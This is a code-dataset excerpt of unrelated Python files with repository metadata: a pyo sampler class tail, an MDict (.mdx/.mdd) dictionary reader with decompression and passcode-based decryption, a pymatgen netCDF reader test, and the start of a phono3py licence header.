x: float or PyoObject
new `speed` attribute.
"""
pyoArgsAssert(self, "O", x)
self._speed = x
x, lmax = convertArgsToLists(x)
[obj.setSpeed(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def setMark(self, x):
"""
Replace the `mark` attribute.
:Args:
x: float or PyoObject
new `mark` attribute.
"""
pyoArgsAssert(self, "O", x)
self._mark = x
x, lmax = convertArgsToLists(x)
[obj.setMark(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def setInterp(self, x):
"""
Replace the `interp` attribute.
:Args:
x: int {1, 2, 3, 4}
new `interp` attribute.
"""
pyoArgsAssert(self, "i", x)
self._interp = x
x, lmax = convertArgsToLists(x)
[obj.setInterp(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def getMarkers(self):
"""
Returns a list of marker time values in samples.
"""
return self._markers
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [
SLMap(0.01, 2.0, "lin", "speed", self._speed),
SLMap(0, len(self._markers) - 1, "lin", "mark", self._mark, "int"),
SLMap(1, 4, "lin", "interp", self._interp, res="int", dataOnly=True),
SLMapMul(self._mul),
]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def speed(self):
"""float or PyoObject. Transposition factor."""
return self._speed
@speed.setter
def speed(self, x):
self.setSpeed(x)
@property
def mark(self):
"""float or PyoObject. Marker to loop."""
return self._marker
@mark.setter
def mark(self, x):
self.setMark(x)
@property
def interp(self):
"""int {1, 2, 3, 4}. Interpolation method."""
return self._interp
@interp.setter
def interp(self, x):
self.setInterp(x)
|
belangeo/pyo
|
pyo/lib/players.py
|
Python
|
lgpl-3.0
| 20,439
|
[
"Gaussian"
] |
0a2886e650b3e500ec88f764e45c9dae3e4842f80c3ff3119e2a9a4591a04ed6
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# readmdict.py
# Octopus MDict Dictionary File (.mdx) and Resource File (.mdd) Analyser
#
# Copyright (C) 2012, 2013, 2015 Xiaoqiang Wang <xiaoqiangwang AT gmail DOT com>
#
# This program is a free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# You can get a copy of GNU General Public License along this program
# But you can always get it from http://www.gnu.org/licenses/gpl.txt
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from struct import pack, unpack
from io import BytesIO
import re
import sys
import json
from .ripemd128 import ripemd128
from .pureSalsa20 import Salsa20
from aqt.utils import showInfo, showText, tooltip
# zlib compression is used for engine version >=2.0
import zlib
# LZO compression is used for engine version < 2.0
try:
import lzo
except ImportError:
lzo = None
print("LZO compression support is not available")
# 2x3 compatible
if sys.hexversion >= 0x03000000:
unicode = str
def _unescape_entities(text):
"""
unescape offending tags < > " &
"""
text = text.replace(b'<', b'<')
text = text.replace(b'>', b'>')
text = text.replace(b'"', b'"')
text = text.replace(b'&', b'&')
return text
def _fast_decrypt(data, key):
b = bytearray(data)
key = bytearray(key)
previous = 0x36
for i in range(len(b)):
t = (b[i] >> 4 | b[i] << 4) & 0xff
t = t ^ previous ^ (i & 0xff) ^ key[i % len(key)]
previous = b[i]
b[i] = t
return bytes(b)
def _mdx_decrypt(comp_block):
key = ripemd128(comp_block[4:8] + pack(b'<L', 0x3695))
return comp_block[0:8] + _fast_decrypt(comp_block[8:], key)
def _salsa_decrypt(ciphertext, encrypt_key):
s20 = Salsa20(key=encrypt_key, IV=b"\x00" * 8, rounds=8)
return s20.encryptBytes(ciphertext)
def _decrypt_regcode_by_deviceid(reg_code, deviceid):
deviceid_digest = ripemd128(deviceid)
s20 = Salsa20(key=deviceid_digest, IV=b"\x00" * 8, rounds=8)
encrypt_key = s20.encryptBytes(reg_code)
return encrypt_key
def _decrypt_regcode_by_email(reg_code, email):
email_digest = ripemd128(email.decode().encode('utf-16-le'))
s20 = Salsa20(key=email_digest, IV=b"\x00" * 8, rounds=8)
encrypt_key = s20.encryptBytes(reg_code)
return encrypt_key
class MDict(object):
"""
Base class which reads in header and key block.
It has no public methods and serves only as code sharing base class.
"""
def __init__(self, fname, encoding='', passcode=None, only_header=False):
self._fname = fname
self._encoding = encoding.upper()
self._passcode = passcode
self.header = self._read_header()
if only_header:
return
try:
self._key_list = self._read_keys()
except:
print("Try Brutal Force on Encrypted Key Blocks")
self._key_list = self._read_keys_brutal()
def __len__(self):
return self._num_entries
def __iter__(self):
return self.keys()
def keys(self):
"""
Return an iterator over dictionary keys.
"""
return (key_value for key_id, key_value in self._key_list)
def _read_number(self, f):
return unpack(self._number_format, f.read(self._number_width))[0]
def _parse_header(self, header):
"""
extract attributes from <Dict attr="value" ... >
"""
taglist = re.findall(b'(\w+)="(.*?)"', header, re.DOTALL)
tagdict = {}
for key, value in taglist:
tagdict[key] = _unescape_entities(value)
return tagdict
def _decode_key_block_info(self, key_block_info_compressed):
if self._version >= 2:
# zlib compression
assert(key_block_info_compressed[:4] == b'\x02\x00\x00\x00')
# decrypt if needed
if self._encrypt & 0x02:
key_block_info_compressed = _mdx_decrypt(
key_block_info_compressed)
# decompress
key_block_info = zlib.decompress(key_block_info_compressed[8:])
# adler checksum
adler32 = unpack('>I', key_block_info_compressed[4:8])[0]
assert(adler32 == zlib.adler32(key_block_info) & 0xffffffff)
else:
# no compression
key_block_info = key_block_info_compressed
# decode
key_block_info_list = []
num_entries = 0
i = 0
if self._version >= 2:
byte_format = '>H'
byte_width = 2
text_term = 1
else:
byte_format = '>B'
byte_width = 1
text_term = 0
while i < len(key_block_info):
# number of entries in current key block
num_entries += unpack(self._number_format,
key_block_info[i:i + self._number_width])[0]
i += self._number_width
# text head size
text_head_size = unpack(byte_format, key_block_info[
i:i + byte_width])[0]
i += byte_width
# text head
if self._encoding != 'UTF-16':
i += text_head_size + text_term
else:
i += (text_head_size + text_term) * 2
# text tail size
text_tail_size = unpack(byte_format, key_block_info[
i:i + byte_width])[0]
i += byte_width
# text tail
if self._encoding != 'UTF-16':
i += text_tail_size + text_term
else:
i += (text_tail_size + text_term) * 2
# key block compressed size
key_block_compressed_size = unpack(self._number_format, key_block_info[
i:i + self._number_width])[0]
i += self._number_width
# key block decompressed size
key_block_decompressed_size = unpack(self._number_format, key_block_info[
i:i + self._number_width])[0]
i += self._number_width
key_block_info_list += [(key_block_compressed_size,
key_block_decompressed_size)]
assert(num_entries == self._num_entries)
return key_block_info_list
def _decode_key_block(self, key_block_compressed, key_block_info_list):
key_list = []
i = 0
for compressed_size, decompressed_size in key_block_info_list:
start = i
end = i + compressed_size
# 4 bytes : compression type
key_block_type = key_block_compressed[start:start + 4]
# 4 bytes : adler checksum of decompressed key block
adler32 = unpack('>I', key_block_compressed[
start + 4:start + 8])[0]
if key_block_type == b'\x00\x00\x00\x00':
key_block = key_block_compressed[start + 8:end]
elif key_block_type == b'\x01\x00\x00\x00':
if lzo is None:
print("LZO compression is not supported")
break
# decompress key block
header = b'\xf0' + pack('>I', decompressed_size)
key_block = lzo.decompress(key_block_compressed[
start + 8:end], initSize=decompressed_size, blockSize=1308672)
elif key_block_type == b'\x02\x00\x00\x00':
# decompress key block
key_block = zlib.decompress(
key_block_compressed[start + 8:end])
# extract one single key block into a key list
key_list += self._split_key_block(key_block)
# notice that adler32 returns signed value
assert(adler32 == zlib.adler32(key_block) & 0xffffffff)
i += compressed_size
return key_list
def _split_key_block(self, key_block):
key_list = []
key_start_index = 0
while key_start_index < len(key_block):
temp = key_block[
key_start_index:key_start_index + self._number_width]
# the corresponding record's offset in record block
key_id = unpack(self._number_format, key_block[
key_start_index:key_start_index + self._number_width])[0]
# key text ends with '\x00'
if self._encoding == 'UTF-16':
delimiter = b'\x00\x00'
width = 2
else:
delimiter = b'\x00'
width = 1
i = key_start_index + self._number_width
while i < len(key_block):
if key_block[i:i + width] == delimiter:
key_end_index = i
break
i += width
key_text = key_block[key_start_index + self._number_width:key_end_index]\
.decode(self._encoding, errors='ignore').encode('utf-8').strip()
key_start_index = key_end_index + width
key_list += [(key_id, key_text)]
return key_list
@property
def meta(self):
return {'title': self._title, 'description': self._description,
'encoding': self._encoding, 'version': self._version,
'stylesheet': json.dumps(self._stylesheet)}
def _read_header(self):
f = open(self._fname, 'rb')
# number of bytes of header text
header_bytes_size = unpack('>I', f.read(4))[0]
header_bytes = f.read(header_bytes_size)
# 4 bytes: adler32 checksum of header, in little endian
adler32 = unpack('<I', f.read(4))[0]
assert(adler32 == zlib.adler32(header_bytes) & 0xffffffff)
# mark down key block offset
self._key_block_offset = f.tell()
f.close()
# header text in utf-16 encoding ending with '\x00\x00'
header_text = header_bytes[:-2].decode('utf-16').encode('utf-8')
header_tag = self._parse_header(header_text)
if not self._encoding:
encoding = header_tag[b'Encoding']
if sys.hexversion >= 0x03000000:
encoding = encoding.decode('utf-8')
# GB18030 > GBK > GB2312
if encoding in ['GBK', 'GB2312']:
encoding = 'GB18030'
self._encoding = encoding
# 读取标题和描述
if b'Title' in header_tag:
self._title = header_tag[b'Title'].decode('utf-8')
else:
self._title = ''
if b'Description' in header_tag:
self._description = header_tag[b'Description'].decode('utf-8')
else:
self._description = ''
pass
# encryption flag
# 0x00 - no encryption
# 0x01 - encrypt record block
# 0x02 - encrypt key info block
if b'Encrypted' not in header_tag or header_tag[b'Encrypted'] == b'No':
self._encrypt = 0
elif header_tag[b'Encrypted'] == b'Yes':
self._encrypt = 1
else:
self._encrypt = int(header_tag[b'Encrypted'])
# stylesheet attribute if present takes form of:
# style_number # 1-255
# style_begin # or ''
# style_end # or ''
# store stylesheet in dict in the form of
# {'number' : ('style_begin', 'style_end')}
self._stylesheet = {}
if header_tag.get('StyleSheet'):
lines = header_tag['StyleSheet'].splitlines()
for i in range(0, len(lines), 3):
self._stylesheet[lines[i]] = (lines[i + 1], lines[i + 2])
# before version 2.0, number is 4 bytes integer
# version 2.0 and above uses 8 bytes
self._version = float(header_tag[b'GeneratedByEngineVersion'])
if self._version < 2.0:
self._number_width = 4
self._number_format = '>I'
else:
self._number_width = 8
self._number_format = '>Q'
return header_tag
def _read_keys(self):
f = open(self._fname, 'rb')
f.seek(self._key_block_offset)
# the following numbers could be encrypted
if self._version >= 2.0:
num_bytes = 8 * 5
else:
num_bytes = 4 * 4
block = f.read(num_bytes)
if self._encrypt & 1:
if self._passcode is None:
raise RuntimeError(
'user identification is needed to read encrypted file')
regcode, userid = self._passcode
if isinstance(userid, unicode):
userid = userid.encode('utf8')
if self.header[b'RegisterBy'] == b'EMail':
encrypted_key = _decrypt_regcode_by_email(regcode, userid)
else:
encrypted_key = _decrypt_regcode_by_deviceid(regcode, userid)
block = _salsa_decrypt(block, encrypted_key)
# decode this block
sf = BytesIO(block)
# number of key blocks
num_key_blocks = self._read_number(sf)
# number of entries
self._num_entries = self._read_number(sf)
# number of bytes of key block info after decompression
if self._version >= 2.0:
key_block_info_decomp_size = self._read_number(sf)
# number of bytes of key block info
key_block_info_size = self._read_number(sf)
# number of bytes of key block
key_block_size = self._read_number(sf)
# 4 bytes: adler checksum of previous 5 numbers
if self._version >= 2.0:
adler32 = unpack('>I', f.read(4))[0]
assert adler32 == (zlib.adler32(block) & 0xffffffff)
# read key block info, which indicates key block's compressed and
# decompressed size
key_block_info = f.read(key_block_info_size)
key_block_info_list = self._decode_key_block_info(key_block_info)
assert(num_key_blocks == len(key_block_info_list))
# read key block
key_block_compressed = f.read(key_block_size)
# extract key block
key_list = self._decode_key_block(
key_block_compressed, key_block_info_list)
self._record_block_offset = f.tell()
f.close()
return key_list
def _read_keys_brutal(self):
f = open(self._fname, 'rb')
f.seek(self._key_block_offset)
# the following numbers could be encrypted, disregard them!
if self._version >= 2.0:
num_bytes = 8 * 5 + 4
key_block_type = b'\x02\x00\x00\x00'
else:
num_bytes = 4 * 4
key_block_type = b'\x01\x00\x00\x00'
block = f.read(num_bytes)
# key block info
# 4 bytes '\x02\x00\x00\x00'
# 4 bytes adler32 checksum
# unknown number of bytes follows until '\x02\x00\x00\x00' which marks
# the beginning of key block
key_block_info = f.read(8)
if self._version >= 2.0:
assert key_block_info[:4] == b'\x02\x00\x00\x00'
while True:
fpos = f.tell()
t = f.read(1024)
index = t.find(key_block_type)
if index != -1:
key_block_info += t[:index]
f.seek(fpos + index)
break
else:
key_block_info += t
key_block_info_list = self._decode_key_block_info(key_block_info)
key_block_size = sum(list(zip(*key_block_info_list))[0])
# read key block
key_block_compressed = f.read(key_block_size)
# extract key block
key_list = self._decode_key_block(
key_block_compressed, key_block_info_list)
self._record_block_offset = f.tell()
f.close()
self._num_entries = len(key_list)
return key_list
class MDD(MDict):
"""
MDict resource file format (*.MDD) reader.
>>> mdd = MDD('example.mdd')
>>> len(mdd)
208
>>> for filename,content in mdd.items():
... print filename, content[:10]
"""
def __init__(self, fname, passcode=None):
MDict.__init__(self, fname, encoding='UTF-16', passcode=passcode)
def items(self):
"""Return a generator which in turn produce tuples in the form of (filename, content)
"""
return self._decode_record_block()
def _decode_record_block(self):
f = open(self._fname, 'rb')
f.seek(self._record_block_offset)
num_record_blocks = self._read_number(f)
num_entries = self._read_number(f)
assert(num_entries == self._num_entries)
record_block_info_size = self._read_number(f)
record_block_size = self._read_number(f)
# record block info section
record_block_info_list = []
size_counter = 0
for i in range(num_record_blocks):
compressed_size = self._read_number(f)
decompressed_size = self._read_number(f)
record_block_info_list += [(compressed_size, decompressed_size)]
size_counter += self._number_width * 2
assert(size_counter == record_block_info_size)
# actual record block
offset = 0
i = 0
size_counter = 0
for compressed_size, decompressed_size in record_block_info_list:
record_block_compressed = f.read(compressed_size)
# 4 bytes: compression type
record_block_type = record_block_compressed[:4]
# 4 bytes: adler32 checksum of decompressed record block
adler32 = unpack('>I', record_block_compressed[4:8])[0]
if record_block_type == b'\x00\x00\x00\x00':
record_block = record_block_compressed[8:]
elif record_block_type == b'\x01\x00\x00\x00':
if lzo is None:
print("LZO compression is not supported")
break
# decompress
header = b'\xf0' + pack('>I', decompressed_size)
record_block = lzo.decompress(record_block_compressed[
start + 8:end], initSize=decompressed_size, blockSize=1308672)
elif record_block_type == b'\x02\x00\x00\x00':
# decompress
record_block = zlib.decompress(record_block_compressed[8:])
# notice that adler32 return signed value
assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
assert(len(record_block) == decompressed_size)
# split record block according to the offset info from key block
while i < len(self._key_list):
record_start, key_text = self._key_list[i]
# reach the end of current record block
if record_start - offset >= len(record_block):
break
# record end index
if i < len(self._key_list) - 1:
record_end = self._key_list[i + 1][0]
else:
record_end = len(record_block) + offset
i += 1
data = record_block[record_start - offset:record_end - offset]
yield key_text, data
offset += len(record_block)
size_counter += compressed_size
assert(size_counter == record_block_size)
f.close()
# 获取 mdx 文件的索引列表,格式为
# key_text(关键词,可以由后面的 keylist 得到)
# file_pos(record_block开始的位置)
# compressed_size(record_block压缩前的大小)
# decompressed_size(解压后的大小)
# record_block_type(record_block 的压缩类型)
# record_start (以下三个为从 record_block 中提取某一调记录需要的参数,可以直接保存)
# record_end
# offset
def get_index(self, check_block=True):
f = open(self._fname, 'rb')
index_dict_list = []
f.seek(self._record_block_offset)
num_record_blocks = self._read_number(f)
num_entries = self._read_number(f)
assert(num_entries == self._num_entries)
record_block_info_size = self._read_number(f)
record_block_size = self._read_number(f)
# record block info section
record_block_info_list = []
size_counter = 0
for i in range(num_record_blocks):
compressed_size = self._read_number(f)
decompressed_size = self._read_number(f)
record_block_info_list += [(compressed_size, decompressed_size)]
size_counter += self._number_width * 2
# todo:注意!!!
assert(size_counter == record_block_info_size)
# actual record block
offset = 0
i = 0
size_counter = 0
for compressed_size, decompressed_size in record_block_info_list:
current_pos = f.tell()
record_block_compressed = f.read(compressed_size)
# 4 bytes: compression type
record_block_type = record_block_compressed[:4]
# 4 bytes: adler32 checksum of decompressed record block
adler32 = unpack('>I', record_block_compressed[4:8])[0]
if record_block_type == b'\x00\x00\x00\x00':
_type = 0
if check_block:
record_block = record_block_compressed[8:]
elif record_block_type == b'\x01\x00\x00\x00':
_type = 1
if lzo is None:
print("LZO compression is not supported")
break
# decompress
header = b'\xf0' + pack('>I', decompressed_size)
if check_block:
record_block = lzo.decompress(record_block_compressed[
start + 8:end], initSize=decompressed_size, blockSize=1308672)
elif record_block_type == b'\x02\x00\x00\x00':
# decompress
_type = 2
if check_block:
record_block = zlib.decompress(record_block_compressed[8:])
# notice that adler32 return signed value
if check_block:
assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
assert(len(record_block) == decompressed_size)
# split record block according to the offset info from key block
while i < len(self._key_list):
# 用来保存索引信息的空字典
index_dict = {}
index_dict['file_pos'] = current_pos
index_dict['compressed_size'] = compressed_size
index_dict['decompressed_size'] = decompressed_size
index_dict['record_block_type'] = _type
record_start, key_text = self._key_list[i]
index_dict['record_start'] = record_start
index_dict['key_text'] = key_text.decode(
"utf-8", errors='ignore')
index_dict['offset'] = offset
# reach the end of current record block
if record_start - offset >= decompressed_size:
break
# record end index
if i < len(self._key_list) - 1:
record_end = self._key_list[i + 1][0]
else:
record_end = decompressed_size + offset
index_dict['record_end'] = record_end
i += 1
if check_block:
data = record_block[
record_start - offset:record_end - offset]
index_dict_list.append(index_dict)
# yield key_text, data
offset += decompressed_size
size_counter += compressed_size
assert(size_counter == record_block_size)
f.close()
return index_dict_list
class MDX(MDict):
"""
MDict dictionary file format (*.MDD) reader.
>>> mdx = MDX('example.mdx')
>>> len(mdx)
42481
>>> for key,value in mdx.items():
... print key, value[:10]
"""
def __init__(self, fname, encoding='', substyle=False, passcode=None, only_header=False):
MDict.__init__(self, fname, encoding, passcode, only_header)
self._substyle = substyle
def items(self):
"""Return a generator which in turn produce tuples in the form of (key, value)
"""
return self._decode_record_block()
def _substitute_stylesheet(self, txt):
# substitute stylesheet definition
txt_list = re.split('`\d+`', txt)
txt_tag = re.findall('`\d+`', txt)
txt_styled = txt_list[0]
for j, p in enumerate(txt_list[1:]):
style = self._stylesheet[txt_tag[j][1:-1]]
if p and p[-1] == '\n':
txt_styled = txt_styled + \
style[0] + p.rstrip() + style[1] + '\r\n'
else:
txt_styled = txt_styled + style[0] + p + style[1]
return txt_styled
def _decode_record_block(self):
f = open(self._fname, 'rb')
f.seek(self._record_block_offset)
num_record_blocks = self._read_number(f)
num_entries = self._read_number(f)
assert(num_entries == self._num_entries)
record_block_info_size = self._read_number(f)
record_block_size = self._read_number(f)
# record block info section
record_block_info_list = []
size_counter = 0
for i in range(num_record_blocks):
compressed_size = self._read_number(f)
decompressed_size = self._read_number(f)
record_block_info_list += [(compressed_size, decompressed_size)]
size_counter += self._number_width * 2
assert(size_counter == record_block_info_size)
# actual record block data
offset = 0
i = 0
size_counter = 0
# 最后的索引表的格式为
# key_text(关键词,可以由后面的 keylist 得到)
# file_pos(record_block开始的位置)
# compressed_size(record_block压缩前的大小)
# decompressed_size(解压后的大小)
# record_block_type(record_block 的压缩类型)
# record_start (以下三个为从 record_block 中提取某一调记录需要的参数,可以直接保存)
# record_end
# offset
for compressed_size, decompressed_size in record_block_info_list:
record_block_compressed = f.read(compressed_size)
# 要得到 record_block_compressed 需要得到 compressed_size (这个可以直接记录)
# 另外还需要记录当前 f 对象的位置
# 使用 f.tell() 命令/ 在建立索引是需要 f.seek()
# 4 bytes indicates block compression type
record_block_type = record_block_compressed[:4]
# 4 bytes adler checksum of uncompressed content
adler32 = unpack('>I', record_block_compressed[4:8])[0]
# no compression
if record_block_type == b'\x00\x00\x00\x00':
record_block = record_block_compressed[8:]
# lzo compression
elif record_block_type == b'\x01\x00\x00\x00':
if lzo is None:
print("LZO compression is not supported")
break
# decompress
header = b'\xf0' + pack('>I', decompressed_size)
record_block = lzo.decompress(record_block_compressed[
8:], initSize=decompressed_size, blockSize=1308672)
# zlib compression
elif record_block_type == b'\x02\x00\x00\x00':
# decompress
record_block = zlib.decompress(record_block_compressed[8:])
# 这里比较重要的是先要得到 record_block, 而 record_block 是解压得到的,其中一共有三种解压方法
# 需要的信息有 record_block_compressed, decompress_size,
# record_block_type
# 另外还需要校验信息 adler32
# notice that adler32 return signed value
assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
assert(len(record_block) == decompressed_size)
# split record block according to the offset info from key block
while i < len(self._key_list):
record_start, key_text = self._key_list[i]
# reach the end of current record block
if record_start - offset >= len(record_block):
break
# record end index
if i < len(self._key_list) - 1:
record_end = self._key_list[i + 1][0]
else:
record_end = len(record_block) + offset
i += 1
# 需要得到 record_block , record_start, record_end,
# offset
record = record_block[
record_start - offset:record_end - offset]
# convert to utf-8
record = record.decode(self._encoding, errors='ignore').strip(
u'\x00').encode('utf-8')
# substitute styles
# 是否替换样式表
if self._substyle and self._stylesheet:
record = self._substitute_stylesheet(record)
yield key_text, record
offset += len(record_block)
size_counter += compressed_size
assert(size_counter == record_block_size)
f.close()
# 获取 mdx 文件的索引列表,格式为
# key_text(关键词,可以由后面的 keylist 得到)
# file_pos(record_block开始的位置)
# compressed_size(record_block压缩前的大小)
# decompressed_size(解压后的大小)
# record_block_type(record_block 的压缩类型)
# record_start (以下三个为从 record_block 中提取某一调记录需要的参数,可以直接保存)
# record_end
# offset
# 所需 metadata
###
def get_index(self, check_block=True):
# 索引列表
index_dict_list = []
f = open(self._fname, 'rb')
f.seek(self._record_block_offset)
num_record_blocks = self._read_number(f)
num_entries = self._read_number(f)
assert(num_entries == self._num_entries)
record_block_info_size = self._read_number(f)
record_block_size = self._read_number(f)
# record block info section
record_block_info_list = []
size_counter = 0
for i in range(num_record_blocks):
compressed_size = self._read_number(f)
decompressed_size = self._read_number(f)
record_block_info_list += [(compressed_size, decompressed_size)]
size_counter += self._number_width * 2
assert(size_counter == record_block_info_size)
# actual record block data
offset = 0
i = 0
size_counter = 0
# 最后的索引表的格式为
# key_text(关键词,可以由后面的 keylist 得到)
# file_pos(record_block开始的位置)
# compressed_size(record_block压缩前的大小)
# decompressed_size(解压后的大小)
# record_block_type(record_block 的压缩类型)
# record_start (以下三个为从 record_block 中提取某一调记录需要的参数,可以直接保存)
# record_end
# offset
for compressed_size, decompressed_size in record_block_info_list:
current_pos = f.tell()
record_block_compressed = f.read(compressed_size)
# 要得到 record_block_compressed 需要得到 compressed_size (这个可以直接记录)
# 另外还需要记录当前 f 对象的位置
# 使用 f.tell() 命令/ 在建立索引是需要 f.seek()
# 4 bytes indicates block compression type
record_block_type = record_block_compressed[:4]
# 4 bytes adler checksum of uncompressed content
adler32 = unpack('>I', record_block_compressed[4:8])[0]
# no compression
if record_block_type == b'\x00\x00\x00\x00':
_type = 0
record_block = record_block_compressed[8:]
# lzo compression
elif record_block_type == b'\x01\x00\x00\x00':
_type = 1
if lzo is None:
print("LZO compression is not supported")
break
# decompress
header = b'\xf0' + pack('>I', decompressed_size)
if check_block:
record_block = lzo.decompress(record_block_compressed[
8:], initSize=decompressed_size, blockSize=1308672)
# zlib compression
elif record_block_type == b'\x02\x00\x00\x00':
# decompress
_type = 2
if check_block:
record_block = zlib.decompress(record_block_compressed[8:])
# 这里比较重要的是先要得到 record_block, 而 record_block 是解压得到的,其中一共有三种解压方法
# 需要的信息有 record_block_compressed, decompress_size,
# record_block_type
# 另外还需要校验信息 adler32
# notice that adler32 return signed value
if check_block:
assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
assert(len(record_block) == decompressed_size)
# split record block according to the offset info from key block
while i < len(self._key_list):
# 用来保存索引信息的空字典
index_dict = {}
index_dict['file_pos'] = current_pos
index_dict['compressed_size'] = compressed_size
index_dict['decompressed_size'] = decompressed_size
index_dict['record_block_type'] = _type
record_start, key_text = self._key_list[i]
index_dict['record_start'] = record_start
index_dict['key_text'] = key_text.decode(
'utf-8', errors='ignore')
index_dict['offset'] = offset
# reach the end of current record block
if record_start - offset >= decompressed_size:
break
# record end index
if i < len(self._key_list) - 1:
record_end = self._key_list[i + 1][0]
else:
record_end = decompressed_size + offset
index_dict['record_end'] = record_end
i += 1
# 需要得到 record_block , record_start, record_end,
# offset
if check_block:
record = record_block[
record_start - offset:record_end - offset]
# convert to utf-8
record = record.decode(self._encoding, errors='ignore').strip(
u'\x00').encode('utf-8')
# substitute styles
# 是否替换样式表
if self._substyle and self._stylesheet:
record = self._substitute_stylesheet(record)
index_dict_list.append(index_dict)
offset += decompressed_size
size_counter += compressed_size
# todo: 注意!!!
#assert(size_counter == record_block_size)
f.close
return index_dict_list
if __name__ == '__main__':
import sys
import os
import os.path
import argparse
import codecs
def passcode(s):
try:
regcode, userid = s.split(',')
except:
raise argparse.ArgumentTypeError("Passcode must be regcode,userid")
try:
regcode = codecs.decode(regcode, 'hex')
except:
raise argparse.ArgumentTypeError(
"regcode must be a 32 bytes hexadecimal string")
return regcode, userid
parser = argparse.ArgumentParser()
parser.add_argument('-x', '--extract', action="store_true",
help='extract mdx to source format and extract files from mdd')
parser.add_argument('-s', '--substyle', action="store_true",
help='substitute style definition if present')
parser.add_argument('-d', '--datafolder', default="data",
help='folder to extract data files from mdd')
parser.add_argument('-e', '--encoding', default="",
help='folder to extract data files from mdd')
parser.add_argument('-p', '--passcode', default=None, type=passcode,
help='register_code,email_or_deviceid')
parser.add_argument("filename", nargs='?', help="mdx file name")
args = parser.parse_args()
# use GUI to select file, default to extract
if not args.filename:
import Tkinter
import tkFileDialog
root = Tkinter.Tk()
root.withdraw()
args.filename = tkFileDialog.askopenfilename(parent=root)
args.extract = True
if not os.path.exists(args.filename):
print("Please specify a valid MDX/MDD file")
base, ext = os.path.splitext(args.filename)
# read mdx file
if ext.lower() == os.path.extsep + 'mdx':
mdx = MDX(args.filename, args.encoding, args.substyle, args.passcode)
if type(args.filename) is unicode:
bfname = args.filename.encode('utf-8')
else:
bfname = args.filename
print('======== %s ========' % bfname)
print(' Number of Entries : %d' % len(mdx))
for key, value in mdx.header.items():
print(' %s : %s' % (key, value))
else:
mdx = None
# find companion mdd file
mdd_filename = ''.join([base, os.path.extsep, 'mdd'])
if os.path.exists(mdd_filename):
mdd = MDD(mdd_filename, args.passcode)
if type(mdd_filename) is unicode:
bfname = mdd_filename.encode('utf-8')
else:
bfname = mdd_filename
print('======== %s ========' % bfname)
print(' Number of Entries : %d' % len(mdd))
for key, value in mdd.header.items():
print(' %s : %s' % (key, value))
else:
mdd = None
if args.extract:
# write out glos
if mdx:
output_fname = ''.join([base, os.path.extsep, 'txt'])
tf = open(output_fname, 'wb')
for key, value in mdx.items():
tf.write(key)
tf.write(b'\r\n')
tf.write(value)
if not value.endswith(b'\n'):
tf.write(b'\r\n')
tf.write(b'</>\r\n')
tf.close()
# write out style
if mdx.header.get('StyleSheet'):
style_fname = ''.join([base, '_style', os.path.extsep, 'txt'])
sf = open(style_fname, 'wb')
sf.write(b'\r\n'.join(mdx.header['StyleSheet'].splitlines()))
sf.close()
# write out optional data files
if mdd:
datafolder = os.path.join(
os.path.dirname(args.filename), args.datafolder)
if not os.path.exists(datafolder):
os.makedirs(datafolder)
for key, value in mdd.items():
fname = key.decode('utf-8').replace('\\', os.path.sep)
dfname = datafolder + fname
if not os.path.exists(os.path.dirname(dfname)):
os.makedirs(os.path.dirname(dfname))
df = open(dfname, 'wb')
df.write(value)
df.close()
|
finalion/WordQuery
|
src/libs/mdict/readmdict.py
|
Python
|
gpl-3.0
| 40,280
|
[
"Octopus"
] |
b52230034ea452bf72b6df2918521a6e10561b93b22a62993ab365284d3ac3b2
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals, division, print_function
import os
import unittest
import numpy as np
from pymatgen import Structure
from pymatgen.util.testing import PymatgenTest
from pymatgen.io.abinitio import ETSF_Reader
try:
import netCDF4
except ImportError:
netCDF4 = None
_test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", "..",
'test_files')
def ref_file(filename):
return os.path.join(_test_dir, filename)
class ETSF_Reader_TestCase(PymatgenTest):
def setUp(self):
formulas = ["Si2",]
self.GSR_paths = d = {}
for formula in formulas:
d[formula] = ref_file(formula + "_GSR.nc")
@unittest.skipIf(netCDF4 is None, "Requires Netcdf4")
def test_read_Si2(self):
path = self.GSR_paths["Si2"]
ref_dims = {
"number_of_spins": 1
}
ref_int_values = {
"space_group": 227,
"number_of_states": np.reshape([15, 15], (1,2)),
}
ref_float_values = {
"etotal": -8.85911566912484,
"primitive_vectors": np.reshape([0, 5.125, 5.125, 5.125, 0, 5.125,
5.125, 5.125, 0], (3,3)),
}
with ETSF_Reader(path) as data:
self.assertEqual(data.ngroups, 1)
print(data.read_varnames())
# Test dimensions.
for (dimname, int_ref) in ref_dims.items():
value = data.read_dimvalue(dimname)
self.assert_equal(value, int_ref)
# Test int variables
for (varname, int_ref) in ref_int_values.items():
value = data.read_value(varname)
print(varname, value)
self.assert_equal(value, int_ref)
# Test float variables
for (varname, float_ref) in ref_float_values.items():
value = data.read_value(varname)
print(varname, value)
self.assert_almost_equal(value, float_ref)
#assert 0
# Reading non-existent variables or dims should raise
# a subclass of NetcdReaderError
with self.assertRaises(data.Error):
data.read_value("foobar")
with self.assertRaises(data.Error):
data.read_dimvalue("foobar")
# Unless default is given
assert data.read_value("foobar", default=None) is None
data.print_tree()
for group in data.walk_tree():
print("group: " + str(group))
# Initialize pymatgen structure from GSR.
structure = data.read_structure()
self.assertTrue(isinstance(structure, Structure))
if __name__ == "__main__":
unittest.main()
|
sonium0/pymatgen
|
pymatgen/io/abinitio/tests/test_netcdf.py
|
Python
|
mit
| 2,917
|
[
"pymatgen"
] |
bf15e42a7e3cab5e24946f1235e7287242446d857ae868b8e633cb0cd6135815
|
# Copyright (C) 2020 Atsushi Togo
# All rights reserved.
#
# This file is part of phono3py.
#
# Redistribution and use in source and binary forms, with or without
